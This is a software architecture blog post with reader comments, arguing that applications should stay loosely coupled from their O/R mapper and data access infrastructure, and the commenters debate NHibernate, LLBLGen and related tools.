* Explicitly separate bound variables from function parameters. (I think
this suggestion has merit but I don't know what the interface could look
like.)
* Remove support for default parameters to simplify interface and
documentation? (It doesn't seem like default function parameters would be
very useful.)
* Use "capture" instead of "bind" for the bind/capture keyword? (I like and
prefer "bind".)
Finally, here the links to the submitted formal reviews, for reference. Of
particular note are Krzysztof's and John's reviews for their comments on
the documentation. Some "yes" votes were conditional, but AFAIK Lorenzo has
already agreed to address the relevant conditions.
Krzysztof Czainski
Vicente J. Botet
Andrzej Krzemienski
Paul A. Bristow
[...cannot find link to review...]
Pierre Morcello
Nat Lindon
Thomas Heller
Hartmut Kaiser
John Bytheway
Alexander Nasanov
Edward Diener
Gregory Crosswhite
Finally, really big thanks to everyone for participating in the review and
ancillary discussions. I attempted to be as transparent as possible in
outlining the rationale for my decision above, but if you have any further
questions, do not hesitate to ask.
- Jeff, Review Manager for Local
[1]
[2]
Boost-announce list run by bdawes at acm.org, david.abrahams at rcn.com, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
|
http://lists.boost.org/boost-announce/2011/12/0340.php
|
CC-MAIN-2014-42
|
refinedweb
| 1,442
| 54.93
|
Hi,
Michael Wechner wrote:
> Or what other possibility is there to export stuff with namespaces used?
I'm not sure if this matches your requirements, but you could take a
look at my custom XML exporter class at [1]. Instead of exporting an
entire content subtree, you can implement selective exports by
overriding the includeProperty and includeNode methods. See the class
javadoc for more details and example code.
[1]
I'm still prototyping some aspects of my proposed jcr-ext package, so I
haven't yet committed the class to Jackrabbit contrib. I'll do that once
I'm happy with the overall design.
BR,
Jukka Zitting
|
http://mail-archives.apache.org/mod_mbox/jackrabbit-dev/200503.mbox/%3C1110989099.19022.10.camel@hukka.local%3E
|
CC-MAIN-2014-41
|
refinedweb
| 107
| 65.32
|
29 June 2012 11:45 [Source: ICIS news]
BRISBANE (ICIS)--Thai MMA plans to shut its 90,000 tonne/year No 1 methyl methacrylate (MMA) line at Map Ta Phut for 10-14 days from July 10 on shortage of feedstock isobutylene, a company source said on Friday.
The company normally secures its raw material from Bangkok Synthetics (BST).
Thai MMA’s No 1 line is currently running at 60-70% of capacity, while its No 2 line with the same 90,000 tonne/year capacity is currently operating at 100%, the source said.
The company is a joint venture between ?xml:namespace>
|
http://www.icis.com/Articles/2012/06/29/9573840/thai-mma-to-shut-no-1-unit-from-july-10-on-feedstock-shortage.html
|
CC-MAIN-2014-10
|
refinedweb
| 103
| 64.75
|
Timin out from a bean
Christopher Sharp
Ranch Hand
Joined: Dec 12, 2007
Posts: 151
posted
Jan 28, 2013 11:35:51
0
Hello,
I want my session to timeout after a given interval of time. In web.xml I've been playing around with:
<session-config> <session-timeout>20</session-timeout> </session-config>
where the time is in minutes. This works correctly for
testing
if I set the time to 1 minute
What I would like to do is to do it programatically using code like this inside my bean as follow:
@ManagedBean(name="login") @SessionScoped public class MyLoginBean implements HttpSessionListener, Serializable { // private variables etc. HttpServletRequest request; HttpSession session = request.getSession(); public MyLoginBean() { session.setMaxInactiveInterval(20); } // The rest of the code }
where the timeout here is now 20 seconds for
test
puposes. Unfortunately, on opening up a browser to look at the application, it fails with the message:
com.sun.faces.mgbean.ManagedBeanCreationException: Cant instantiate class: com.csharp.MyLoginBean.
Followed by:
java.lang.NullPointerException
What am I doing wrong here? I know that setMaxInactiveInterval() refers to the particular session, which in this case is the login bean, rather than everything, which is what the code in web.xml specifies. I have several beans, but timing out the login bean is the only one that matters.
I'm using
JSF
2.0 with Glassfish 3.1.1 and Eclipse Indigo, so some advice would be very much appreciated.
Tim Holloway
Saloon Keeper
Joined: Jun 25, 2001
Posts: 15624
15
I like...
posted
Jan 29, 2013 05:33:02
0
Even before we start talking JSF, there are a couple of things.
1. User-designed login systems are one of the biggest causes of exploitable webapps there are. I always recommend using a security system that was designed and tested by professional security experts over the DIY approach.
J2EE
has a login system built right into the specification and it's quite adequate for the overwhelming majority of all J2EE webapps. I realize that almost every J2EE book ever published has a sample "login form" processor, but in the real world, that's just painting a target on your back.
2. Web applications are not processes. They do not execute except when a request comes in, needs processing, and a response is sent. They do not run as tasks or threads, but instead are called on-demand under a thread that is assigned by the webapp server when the request comes in. That thread is then returned to a general pool when the response has been sent back. So JSF bean or not, there's no way to set up a timer in J2EE-compliant code.
3. The J2EE
HttpSession
object has a finite lifespan, which can be specified in the WEB-INF/web.xml file. The lifespan is the maximum amount of time allowable between incoming Http requests from the user associated with that session. Thus, every time a request comes in, a countdown begins for the session. If that countdown goes to zero, the session is destroyed by the webapp server (NOT the web application). The actual time of destruction is not predictable except that it is guaranteed not to be destroyed until the session timeout has expired. The actual destruction will be handled by the webapp server when it is convenient, although the session itself will be unavailable to any requests coming in in the mean time - a new session would have to be constructed if those requests needed a session.
Now for the JSF-specific stuff:
A JSF managed bean is intended to be a POJO. Attempting to store HttpRequest, HttpResponse,
FacesContext
or other request-related objects in static code will fail, since any such object would be meaningful only as long as the request that constructed the bean is being processed. The same is also true for member methods and constructors - none of these objects can safely carry over between requests.
Customer surveys are for companies who didn't pay proper attention to begin with.
Christopher Sharp
Ranch Hand
Joined: Dec 12, 2007
Posts: 151
posted
Jan 29, 2013 09:02:18
0
Hello Tim,
Yes, I remember you mentioning a while ago about security issues on login pages. Since then I've been working on other parts of my application, which is now mostly finished, and have not done anything with the login page since then until now. In any case while testing I've diasbled the login.
I was playing around and seeing how to get a system to timeout, but I'm aware that the timeout takes place after the last activity. I tried the following with a very short timeout in seconds:
public MyLoginBean() { HttpSession session = (HttpSession) FacesContext.getCurrentInstance().getExternalContext().getSession(true); session.setMaxInactiveInterval(10); }
and it appears to work.
I've just done a quick Google search, and there are resources available on this. The problem is that I don't have much time, so I need to put something together that I can get to work without spending weeks on it.
Do you know of any links with canned login software that I can put in my application with the minimum amount of extra work? That would be very helpful.
Incidentally, how do I correct the subject heading? I only noticed my mistake after submitting. Another question is that after clicking "Submit" a CSRF error page appears.
Tim Holloway
Saloon Keeper
Joined: Jun 25, 2001
Posts: 15624
15
I like...
posted
Jan 29, 2013 10:00:57
0
If you want to set the session timeout interval on a user-by-user basis, I don't think that a JSF bean constructor is the optimal place to do it. You probably should consider putting that login either in a session listener or a servletfilter. That way your session timeout won't be at the mercy of JSF. Besides, there really aren't a whole lot of things it's safe to do in a
ManagedBean
constructor anyway, since the bean isn't fully initialized at that point.
If you use J2EE Container-Managed security, there are no "canned login" routines, because the login is handled entirely by the server, not by logic in the web application. All you need to do is configure web.xml.
I can't remember where, but if you nose around a bit, you should be able to edit your message heading. The CSRF error is probably because we're working on the Ranch security system at the moment.
I agree. Here's the link:
subject: Timin out from a bean
Similar Threads
How to handle a session timeout exception (with MVP Places and Activities) ?
Prompting to relogin on timeout
session expiring causes problems...
session timeout not working
session timeout
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton
|
http://www.coderanch.com/t/603592/JSF/java/Timin-bean
|
CC-MAIN-2014-15
|
refinedweb
| 1,141
| 62.17
|
SYNOPSIS
#include <megahal.h>
void megahal_setnoprompt(void);
void megahal_setnowrap(void);
void megahal_setnobanner(void);
void megahal_seterrorfile(char *filename);
void megahal_setstatusfile(char *filename);
void megahal_initialize(void);
char *megahal_initial_greeting(void);
int megahal_command(char *input);
char *megahal_do_reply(char *input, intlog);
void megahal_output(char *output);
char *megahal_input(char *prompt);
void megahal_cleanup(void);
DESCRIPTIONInitialization
Megahal is initialized with the megahal_initialize() function. megahal_setnoprompt eliminates the prompt from interactive sessions. megahal_setnowrap() stops output from being wrapped. megahal_setnobanner() prevents megahal from printing out the initial 'banner'.
Files
megahal_seterrorfile and megahal_setstatusfile set which files megahal will use for error and status reporting, respectively.
User interaction
megahal_initial_greeting returns an initial greeting for the user, such as "hello", "ciao", etc... megahal_command checks its input for a Megahal command (like QUIT), and acts upon it, if found. If it finds nothing, it returns 0. megahal_do_reply is the core of megahal. It takes a string as input, and calculates a reply, which it returns. meghal_output is for outputting text to stdout, such as megahal's replies. Input may be obtained with megahal_input, which takes a prompt string as an argument, and returns a string input by the user.
Example
main.c in the source distribution is a good example of how to use Megahal's C API.
TCL INTERFACE
load libmh_tcl.so
Load the Tcl interface shared object into the Tcl interpreter.
mh_init
Initialize megahal brain.
mh_doreply text
Takes some text as input and returns a megahal reply.
mh_cleanup
Save megahal brain to disk. You will lose your changes if this does not occur.
PYTHON INTERFACE
import mh_python
Import the Megahal Python interface into the Python interpreter.
mh_python.initbrain()
Initialize megahal brain.
mh_python.doreply(text)
Takes some text as input and returns a megahal reply.
mh_python.learn(text)
Takes some text as input and updates the model without generating a reply.
mh_python.cleanup()
Save megahal brain to disk. You will lose your changes if this does not occur.
REFERENCESMore information can be found about megahal at
Jason Hutchens, the original author of Megahal can be found at:
BUGSThe C library is not yet ready.
AUTHORMan page written by David N. Welton <[email protected]>, modified by Laurent Fousse <[email protected]>.
|
https://manpages.org/megahal-interfaces
|
CC-MAIN-2022-21
|
refinedweb
| 355
| 51.44
|
Go to the first, previous, next, last section, table of contents...
double (*gsl_siman_Efunc_t) (void *xp)
void (*gsl_siman_step_t) (const gsl_rng *r, void *xp, double step_size)
double (*gsl_siman_metric_t) (void *xp, void *yp)
void (*gsl_siman_print_t) (void *xp)
void (*gsl_siman_copy_t) (void *source, void *dest)
void * (*gsl_siman_copy_construct_t) (void *xp)
void (*gsl_siman_destroy_t) (void *xp)
gsl_siman_solve. This structure contains all the information needed to control the search, beyond the energy function, the step function and the initial guess.
int n_tries
int iters_fixed_T
double step_size
double k, t_initial, mu_t, t_min
The simulated annealing package is clumsy, and it has to be because it is written in C, for C callers, and tries to be polymorphic at the same time. But here we provide some examples which can be pasted into your application with little change and should make things easier.
The first example, in one dimensional Cartesian space, sets up an energy function which is a damped sine wave; this has many local minima, but only one global minimum, somewhere between 1.0 and 1.5. The initial guess given is 15.5, which is several local minima away from the global minimum.
#include <math.h> #include <stdlib.h> #include <string.h> #include <gsl/gsl_siman.h> /* set up parameters for this simulated annealing run */ /* how many points do we try before stepping */ #define N_TRIES 200 /* how many iterations for each T? */ #define ITERS_FIXED_T 1000 /* max step size in random walk */ #define STEP_SIZE 1.0 /* Boltzmann constant */ #define K 1.0 /* initial temperature */ #define T_INITIAL 0.008 /* damping factor for temperature */ #define MU_T 1.003 #define T_MIN 2.0e-6 gsl_siman_params_t params = {N_TRIES, ITERS_FIXED_T, STEP_SIZE, K, T_INITIAL, MU_T, T_MIN}; /* now some functions to test in one dimension */ double E1(void *xp) { double x = * ((double *) xp); return exp(-pow((x-1.0),2.0))*sin(8*x); } double M1(void *xp, void *yp) { double x = *((double *) xp); double y = *((double *) yp); return fabs(x - y); } void S1(const gsl_rng * r, void *xp, double step_size) { double old_x = *((double *) xp); double new_x; double u = gsl_rng_uniform(r); new_x = u * 2 * step_size - step_size + old_x; memcpy(xp, &new_x, sizeof(new_x)); } void P1(void *xp) { printf ("%12g", *((double *) xp)); } int main(int argc, char *argv[]) { const gsl_rng_type * T; gsl_rng * r; double x_initial = 15.5; gsl_rng_env_setup(); T = gsl_rng_default; r = gsl_rng_alloc(T); gsl_siman_solve(r, &x_initial, E1, S1, M1, P1, NULL, NULL, NULL, sizeof(double), params); gsl_rng_free (r); return 0; }
Here are a couple of plots that are generated by running
siman_test in the following way:
$ ./siman_test | awk '!/^#/ {print $1, $4}' | graph -y 1.34 1.4 -W0 -X generation -Y position | plot -Tps > siman-test.eps $ ./siman_test | awk '!/^#/ {print $1, $5}' | graph -y -0.88 -0.83 -W0 -X generation -Y energy | plot -Tps > siman-energy.eps
The TSP (Traveling Salesman Problem) is the classic combinatorial optimization problem. I have provided a very simple version of it, based on the coordinates of twelve cities in the southwestern United States. This should maybe be called the Flying Salesman Problem, since I am using the great-circle distance between cities, rather than the driving distance. Also: I assume the earth is a sphere, so I don't use geoid distances.
The
gsl_siman_solve routine finds a route which is 3490.62
Kilometers long; this is confirmed by an exhaustive search of all
possible routes with the same initial city.
The full code can be found in `siman/siman_tsp.c', but I include here some plots generated in the following way:
$ ./siman_tsp > tsp.output $ grep -v "^#" tsp.output | awk '{print $1, $NF}' | graph -y 3300 6500 -W0 -X generation -Y distance -L "TSP - 12 southwest cities" | plot -Tps > 12-cities.eps $ grep initial_city_coord tsp.output | awk '{print $2, $3}' | graph -X "longitude (- means west)" -Y "latitude" -L "TSP - initial-order" -f 0.03 -S 1 0.1 | plot -Tps > initial-route.eps $ grep final_city_coord tsp.output | awk '{print $2, $3}' | graph -X "longitude (- means west)" -Y "latitude" -L "TSP - final-order" -f 0.03 -S 1 0.1 | plot -Tps > final-route.eps
This is the output showing the initial order of the cities; longitude is negative, since it is west and I want the plot to look like a map.
# initial coordinates of cities (longitude and latitude) ###initial_city_coord: -105.95 35.68 Santa Fe ###initial_city_coord: -112.07 33.54 Phoenix ###initial_city_coord: -106.62 35.12 Albuquerque ###initial_city_coord: -103.2 34.41 Clovis ###initial_city_coord: -107.87 37.29 Durango ###initial_city_coord: -96.77 32.79 Dallas ###initial_city_coord: -105.92 35.77 Tesuque ###initial_city_coord: -107.84 35.15 Grants ###initial_city_coord: -106.28 35.89 Los Alamos ###initial_city_coord: -106.76 32.34 Las Cruces ###initial_city_coord: -108.58 37.35 Cortez ###initial_city_coord: -108.74 35.52 Gallup ###initial_city_coord: -105.95 35.68 Santa Fe
The optimal route turns out to be:
# final coordinates of cities (longitude and latitude) ###final_city_coord: -105.95 35.68 Santa Fe ###final_city_coord: -103.2 34.41 Clovis ###final_city_coord: -96.77 32.79 Dallas ###final_city_coord: -106.76 32.34 Las Cruces ###final_city_coord: -112.07 33.54 Phoenix ###final_city_coord: -108.74 35.52 Gallup ###final_city_coord: -108.58 37.35 Cortez ###final_city_coord: -107.87 37.29 Durango ###final_city_coord: -107.84 35.15 Grants ###final_city_coord: -106.62 35.12 Albuquerque ###final_city_coord: -106.28 35.89 Los Alamos ###final_city_coord: -105.92 35.77 Tesuque ###final_city_coord: -105.95 35.68 Santa Fe
Here's a plot of the cost function (energy) versus generation (point in the calculation at which a new temperature is set) for this problem:
Further information is available in the following book,
Go to the first, previous, next, last section, table of contents.
|
http://www.gnu.org/software/gsl/manual/gsl-ref_25.html
|
CC-MAIN-2014-10
|
refinedweb
| 918
| 60.01
|
This Instructable looks at using the Wemos D1 Mini Pro to send datta (Temperature & Humidity) to the Blynk APP.
Teacher Notes
Teachers! Did you use this instructable in your classroom?
Add a Teacher Note to share how you incorporated it into your lesson.
Step 1: Getting Started
We will get a temperature and humidity reading pushed to your Blynk App on your phone. Connect an LED as shown here: Note. I have used the blue DHT11 Digital Temperature/Humidity module which has three pins. The module is from Banggood. Other similar modules from different suppliers may have a different pin layout. Check this. The colours below are correct for the Banggood module:
Blue = Data signal (left)
Red = Vcc +5v (middle)
Black = Ground (right)
Step 2: Important.
As mentioned above.
Note. I used the blue DHT11 Digital Temperature/Humidity module from Banggood which has three pins. Other similar modules from different suppliers may have a different pin layout. Check this. The colours are correct for the Banggood module:
Blue = Data signal (left) Red = Vcc +5v (middle) Black = Ground (right)
Step 3: Getting Started With the Blynk App. You can always set up your own Private Blynk Server (Links to an external site.)Links to an external site. and have full control.
Step 4: Create a New Project
After you’ve successfully logged into your account, start by creating a new project.
Step 5: Name/Board/Connection
Give it a name and select the appropriate board (Wemos D1 Mini). Now click create.
Step 6: Authentication
Your Authentication token will be emailed to you and you will also be able to access it in the settings of your project. A new number will be generated for each project you create.
Step 7: Add Two Widgets (Value Display)
Your project canvas is empty, let’s add a two display widgets to show temperature and humidity. Tap anywhere on the canvas to open the widget box. All the available widgets are located here.
Step 8: Drag N Drop
Drag-n-Drop - Tap and hold the Widget to drag it to the new position.
Step 9: Humidity
Widget Settings - Each Widget has it’s own settings. Tap on the widget to get to them. Set them up with the following settings.
Step 10: Temperature
Widget Settings - Each Widget has it’s own settings. Tap on the widget to get to them. Set them up with the following settings.
Step 11: Run the Project.
Step 12: Run the Code.
Now let’s take a look at the example sketch for a Wemos D1 Mini Pro. Notice there are three key components that you will need to include:
1. char auth[] = ""; Specific to your project (Blynk App).
2. char ssid[] = ""; Specific to the network that we are connecting to (network name). You can "hotspot" from your phone also.
3. char pass[] = ""; Specific to the network we are connecting to (password).
CODE
#define BLYNK_PRINT Serial #include <ESP8266WiFi.h> #include <BlynkSimpleEsp8266.h> #include <DHT.h> // You should get Auth Token in the Blynk App. // Go to the Project Settings (nut icon). char auth[] = ""; // Your WiFi credentials. // Set password to "" for open networks. char ssid[] = ""; char pass[] = ""; #define DHTPIN D4 // What digital pin we're connected to #define DHTTYPE DHT11 // DHT 11<p>DHT dht(DHTPIN, DHTTYPE); BlynkTimer timer; float t; float h; void setup() { // Debug console Serial.begin(9600); Blynk.begin(auth, ssid, pass); dht.begin(); timer.setInterval(1000L, sendSensor); } void loop() { Blynk.run(); timer.run(); } // This function sends Arduino's up time every second to Virtual Pin (5). // In the app, Widget's reading frequency should be set to PUSH. This means // that you define how often to send data to Blynk App. void sendSensor() { h = dht.readHumidity(); t = dht.readTemperature(); // or dht.readTemperature(true) for Fahrenheit // l = analogRead(LDR);); }
Step 13: Display
Go back to the Blynk App and check your display. You should see the current temperature & humidity.
Step 14: Photo of Project
Step 15: Video of Project Working
Participated in the
Arduino Contest 2017
8 Discussions
2 months ago
Na compilação o resultado foi:
'Horas' does not name a type.
Alguém sabe como resolver ?
Obrigado
Question 1 year ago
The compiler gives me an error that 'dht was not declared in this scope'. I have tried to install the correct DHT libraries multiple times but the problem persists.
Answer 11 months ago
DHT dht(DHTPIN, DHTTYPE);
Reply 8 months ago
Could you please expand? Where do we need to put DHT dht(DHTPIN, DHTTYPE);?
Could you please recommend a DHT library to use aswell?
Reply 10 months ago
Thank you! That helped me fix my compiling error.
9 months ago
C:\Users\Victor\Documents\Arduino\libraries\Blynk-0.5.4\src/BlynkSimpleEsp8266.h:18:21: fatal error: version.h: No such file or directory
#include <version.h>
^
compilation terminated.
Question 1 year ago on Step 15
How to change displayed temp to Fahrenheit?
1 year ago
I'd love to have something like this set up here, the weather is so unpredictable lately!
|
https://www.instructables.com/id/Send-Temperature-Humidity-to-Blynk-App-Wemos-D1-Mi/
|
CC-MAIN-2019-43
|
refinedweb
| 837
| 69.07
|
execution python application from browser
I have written a python console based program. It takes few arguments (like file name ) for execution. I want to run it from the browser... How can I parse this arguments and execute that python code Any clues..approaches. Thanks
Answers
Maybe you should clarify your problem. At least i don't fully understand why you want to run a terminal program in the browser?
But if you want to reuse some code you have already written you could use a micro framework like Flask.
Check this example from flask's docs:
from flask import Flask app = Flask(__name__) @app.route("/") def hello(): return "Hello World!" if __name__ == "__main__": app.run()
So you could write a simple view that accepts the arguments you need and the view would then call your code and return whatever you want, most likely an http response.
Need Your Help
ng-token-auth ui-router resolver causes blank screen
javascript ruby-on-rails angularjsI am following the docs for ng-token-auth here trying to add a resolver for auth, which calls validateUser. When I add this block of code from the documentation I render a blank screen. I get no ...
|
http://unixresources.net/faq/8346028.shtml
|
CC-MAIN-2019-13
|
refinedweb
| 201
| 74.79
|
Liquibase migrations with django
Project description
Liquibase migrations for Django
- License: BSD
- Documentation:.
History
0.5.2 (2015-10-22)
- added management to MANIFEST.in
0.5.1 (2015-10-22)
- handle liquibase return codes as an exception
0.5.0 (2015-08-06)
- add documentation and better package layout
0.4.1 (2015-08-06)
- fix for disabling signals
- add possiblity to disable emitting pre- and postmigrate signals
- add example project configured with liquibase migrations
0.4.0 (2014-09-28)
- more detailed messages in makemigrations and squashmigrations commands
- Django 1.7+ compatibility + wrapped migration commands
0.3.0 (2014-02-17)
- Update README.rst
- removed version from __init__
- Update README.rst
- back to previous versioning scheme
- cleaned up settings header
- Changed Makefile:pypi to not use iw.dist
- Update README.rst
- possibility to change liquibase jar and connectors via settings
- db name, host, port were overriden by defaults
0.2.8 (2012-02-28)
- Updated documentation about new LIQUIMIGRATE_CHANGELOG_FILES directive Renamed README.txt to README.rst & included into MANIFEST.in Print additional info only in –verbosity 1 model Minor changes for PEP8
- full multidb support
0.2.7 (2011-06-01)
- emit post_sync signal, call loaddata and initial_data
- support for singledb django versions
- fixed driver option
0.2.6 (2011-05-20)
- accepting –driver option from command line
0.2.5 (2011-05-18)
- Better README.txt - link to liquibase
0.2.4 (2011-05-17)
- FIXED: project path
0.2.3 (2011-05-17)
- Updated README.txt about mysql driver & about BSD license
0.2.2 (2011-05-17)
- ADDED: pass other args as liquibase args
0.2.1 (2011-05-17)
- FIXED: too small tuple when using not supported db driver
0.2.0 (2011-04-29)
- ADDED: mysql connector
0.1.2 (2011-04-28)
- ADDED: custom syncdb command
- ADDED: ensure command was given & more README.txt
- FIXED: run cmdline than just print them ;)
- FIXED: missing vendor in egg
0.1.1 (2011-04-28)
- REMOVED: old dependencies/namespaces
0.1.0 (2011-04-28)
Project details
Release history Release notifications
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/liquimigrate/
|
CC-MAIN-2019-43
|
refinedweb
| 367
| 53.88
|
See my new blog at .jeffreypalermo.com set projects. two..
[Advertisement]
test
Nice post. +1 for loose coupling data access. Those who say "We'll never change our database vendor or O/R mapper" will end up have to explin to their boss later, why they need to spend 50K to rewrite the application later and it will be harder to convince theiry boss that the "new and improved" solution won't need a rewrite in a few years.
~Lee
I'm not sure why you're focussing on the Data Access layer when you say that you want to keep it independent of the technology. The same applies to the presentation layer and business layer. Technology moves on. ASP and .NET 1.1 are legacy technologies that, unfortunately, we have to support. I don't know what we will be wriring apps in in 5 years time, but it won't be in .NET 3.5. You say that you don't believe there is a business justification for re-writing apps when technology moves on. I beleive there is - cost of support and maintenance. My belief is that when we build apps it should be done on the basis that in 5 years the technology will be outdated and we have to rewrite it. Giving the business the impression that this is not the case is misleading.
If you see an O/R mapper as a layer which simply pulls data out of a database and stores it into objects and vice versa, creates queries to save data inside objects, then yes, there's little to be said about o/r mappers.
But that's a very naive view on the world. In 2008, O/R mappers are far more powerful than object fetchers. Just because you use nhibernate and think there's nothing to be said about entity graph management in memory for example, because nhibernate doesn't have features in that direction, doesn't mean all O/R mappers don't have these and other advanced features.
Also, the naive view on being able to swap out any o/r mapper you pick clearly shows you never gave it much thought: no matter which data access solution you pick, (so that means: whatever you choose) it will leak through into your own code. This means that your own code will use and will be based on the characteristics provided by the data-access solution of choice: does it do graph maintenance in memory? Does it offer entity views on entity collections for easy in-memory filtering/sorting ? does it offer auditing/authorization? Which concurrency models are supported? Does it offer deep support for distributed systems so you don't have to babysit what's going over the wire? Does it offer what I need out of the box or do I have to invest a couple of man-months writing additional code ?etc. etc..
And as Gary said above: whatever you pick / choose in the other layers is also important and will also be a factor in maintenance of the application, like which UI package is chosen. But, isn't it also important how database migrations and feature migrations can be done with the data-access solution of choice? Like: if the database chances in the coming year, how easy is it to adapt to those changes? Is it possible to simply point the data-access solution of choice to the new database schemas and let it migrate the work you've done? Or do you have to do that all by yourself and therefore schedule alot of extra testing to check whether you didn't miss a spot?
If you're so concerned about maintenance, those things would be on the top of your list. However you don't even mention them.
Jeff, can you give a concrete example of what your abstraction that you're talking about here would look like?
I agree with your point to a large extent which is why I typically build another layer ontop of the whatever data access mechanism I use be it high or low level. This helps with abstraction considerably and would make a conversion relatively painless, but I can't see how to make this completely transparent. So I'd like to know how you can do this in a way that is indeed pluggable?
I've always done this for many different applications mainly because it provides a more consistent model to talk to data for my own work. But in the end I've also found that I have never actually built an application and switched out the data engine completely (backends yes, but DAL engines no). I've seen apps where the engine's been swapped but in the process the app was redesigned and re-written.
So I'm not so sure that this is as valuable as you are making this out to be and maybe falls under the category over-designing for a non realistic scenario :-}
Frans,
So, you are saying he should use LLBLGen?
Mike: where do I say that?
That's the stupidity of these kind of discussions and comparisons: the people who write o/r mappers, and that group is really small, know these systems in and out, what they can do and can't do. If a person of that group points out that the world is bigger than just fetching objects, it might be the case that that person does that because... the world IS actually bigger than just fetching objects? You also don't listen to any MS employee on any MS organized conference? (because, hey, they're just trying to sell you their stuff! ;)).
What I don't like about the article is that it appears to make nhibernate as the most feature rich, standard o/r mapper for .NET. That's simply not the case, on the contrary.
I'm interested this article doesn't mention IUpdateable or IQueryable. For ASP.NET Dynamic Data, ADO.NET Entity Framework and any other entity technology from Microsoft at the moment, LINQ and providers for these new scaffolding and web service technologies are surely essential. Which is great that LLGLGen is supporting these, to provide a key alternative to ADO.NET Entity Framework. I think it's for these specifics that NHibernate will struggle. For new projects, it doesn't play nice with new takes on rapid development and tooling in Visual Studio.
In other words, too strict de-coupling can actually hinder some enterprise application from quickly creating new interfaces such as for Silverlight or use new Sync type technologies. The blurring of Data Access and Business Logic isn't too evil after all.
@Jeffrey
I completely agree with this approach, both the isolation of the OR/M and the IoC bits. Could you please post a small sample solution demonstrating your technique? If you could keep the mappings simple and provide an IoC swap between NHibernate and LinqToSql you would probably be the first to provide such a sample.
@Frans
I believe you may be one of the most knowledgeable people in the OR/M arena, so with all due respect. The discussion is about architecture and even if LL is the OR/M of choice the points Jeffrey is making are valid. As you have stated Linq is a great step as it provides a unified query language. Linq eliminates the largest hurdle in swapping OR/Ms, eventually all OR/Ms will have Linq providers. We still need a unified session or context but IoC with a simple interface and proxy for the context/session gets us pretty close to a swappable data layer.
I agree with Jeff's fundamental premise: "How do we ensure the long-term maintainability of our systems in the face of constantly changing infrastructure? The answer: Don't couple to infrastructure."
This applies to all aspects of the system regardless of whether or not it is infrastructure, presentation, core, etc.
However, like Gary and Frans said "Whatever you pick / choose in the other layers is also important and will also be a factor in maintenance of the application, like which UI package is chosen."
As much as we would love to have completely pluggable and swappable components and layers in the application, there are usually a number of areas (despite your best attempts at abstraction) where said component has coupled itself a little more deeply that you would have liked.
For our application, we have swapped date pickers twice now. We'd love to do it a third time but it is such a pain.
And for the record, we use LLBLGen Pro. However, we spent a lot of time arguing about whether or not we should use the generated entities in the presentation layer. Gut feel is that we didn't want to do it to avoid coupling the application. However, at the time the benefit of all the plumbing code that was provided (IBindable, etc.) was worth it (CSLA just wasn't working for us at the time).
As so many things in life, there aren't many clear cut answers to everyone's problems. Everybody has to make their decisions based on experiences.
Matt
Frans, now you know why I don't comment on such posts, we are allowed to write them, but unable to comment on them, sigh .... That is not true with Microsoft as was pointed out.
Isolating nhibernate doesn't work in practice. Here's the reason, first 99% of the time you will have to use ISession per request pattern where an httpmodule will ignite Isession and commit it back at the end. 2nd consider within the business layer you have modified a typical domain object which you got it from ISession. You know it nhibernate is tracking your domain object. Thus within your business code you won't be doing anything to save your object since your session will be committed at the end. Once you have such a coding style , how are you going to replace it ?. I think trying to loosely couple against NHibernate is impractical and has little benefit.
What Onur Gumus said above is actually a very valid point, a point of much contention between the Hibernate and Spring groups and the motivating factor behind another new framework in Java. Seam is the next step after ORM to provide a proper implementation and ease of use around conversational access to your domain objects (in particular, when they're stored in a transactional system like a RDBMS).
Hibernate is under the covers, but Seam will likely be where Hibernate is in a few years, at least in the Java space.
Thanks so much for this article and this perspective, Jeffrey. So often "the basis on which we should accept or reject an O/R Mapper" gets missed in the rush to use whatever's perceived as the "new hotness" at the time of consideration. nHibernate and Enterprise Library's data helpers certainly have their merits and I don't mean to discount those, but I've personally never seen why they are *quite* as popular as they are.
There is tension in any ORM solution between learning curve, performance, time saved on deliverables, dependencies, redundancy, and maintainability. I started out preferring frameworks to generated code (and so, dependencies to redundancy), but over time I've been converted to the opposite viewpoint and gone the roll-your-own-tool route in the process. Maybe I'm just a System-namespace purist curmudgeon now, but I can live with that label.
Now I use generators instead of templates or helper frameworks. As a result I have a bit of redundancy in my Data Access tier, but I can tolerate that. The domain objects are pure collections of value types, with a DA layer fronted by a simple get / save / serialize to stream / deserialize from stream interface that could quickly be remapped to any persistence or caching mechanism. The generator tool itself is a bit ugly, to be sure (never bothered prettying it up much), but in return it buys me (a) an extremely quick learning curve, even for less experienced developers, (b) respectable runtime performance, (c) no dependencies outside of .NET itself, (d) really rapid CRUD coding, (e) domain objects that are coupled to nothing, and (f) a DA tier that's only coupling is a loose one to SQL Server, but with an interface that would allow for uncomplicated substitution with another provider, whether by tweaking the generator or updating the classes by hand. It may not be "sexy," and it may have a lot of room for improvement in the SQL coupling, but it's functional, easily taught & learned, and leaves very portable code behind.
Anyway, I really appreciated this article. Whatever tool people use, designers would do well to print out your "How do I ensure I'm not coupled to my O/R Mapper?" and "When choosing an O/R Mapper" sections and pin them up where they'll be seen often.
@onur
I think you're missing the point. Your business objects *SHOULDN'T* be saving themselves. Thats persistance logic (plumbing) not business or domain logic. Its true if you remove nhibernate you'd have to replace it with something else since the objects aren't saving themselves, but presumably another ORM that supports Persistance Ignorance will let you do the same thing without your domain objects being touched.
If for some reason you DID have to remove nhibernate and roll your own, you could do so by replacing the Repositories and the business objects wouldn't have to change. It would be a lot of work, but thats thats the whole reason we use ORMs.
As for the HttpModule, being able to switch that out with something else is built into NHibernate I believe. That part is actually pretty easy.
I guess de-coupling does get a little fuzzy. When I first used nHibernate, we had the idea to build a data gateway layer that would know about nHibernate. This layer would be ignorant to concrete business entities. The repository layer would know about entities and not about nHibernate. In theory we could then swap out the data gateway for something non-nHibernate.
This is not practical. As soon you start to write HQL in the repository layer, you have coupling. The repository must be aware of session...more coupling.
However, it surely is possible to achieve near persistence ignorance in the core business entity layer and also clients higher up the stack.
So +1 for the overall idea of the article. I just inherited a system that has Linq to SQL woven throughout (up to the UI.) Luckily it's a sort of prototype, and the boss has told me I am free to chuck it. However, I could have kept a lot more if the spirit of this article had been followed.
@Gary,
You are correct about the presentation layer and other infrastructure. My company also uses ASP.NET with MonoRail and is starting a large project with the MVC Framework. We consider that as infrastructure and likely to change, and we keep that away from the application core. We treat WinForms and WPF similarly.
